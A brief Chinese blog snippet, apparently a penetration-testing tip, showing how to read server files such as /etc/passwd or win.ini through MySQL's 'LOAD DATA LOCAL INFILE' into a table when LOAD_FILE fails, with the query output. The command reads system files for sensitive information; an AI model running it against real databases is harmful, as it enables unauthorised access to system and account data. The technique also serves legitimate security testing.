load file 读取无效时

连接mysql写入:

mysql> load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';   //test 表名  或者 "C:/Windows/win.ini"
Query OK, 11 rows affected, 11 warnings (0.01 sec)
Records: 11  Deleted: 0  Skipped: 0  Warnings: 1

前台执行:select * from `test`

针对mysql的后台语句执行读取敏感信息

 

相关文章:

  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-02-05
  • 2021-11-19
  • 2021-07-21
  • 2022-01-20
猜你喜欢
  • 2022-12-23
  • 2021-08-18
  • 2021-05-28
  • 2021-09-06
  • 2021-04-19
  • 2021-12-24
  • 2021-09-18
相关资源
相似解决方案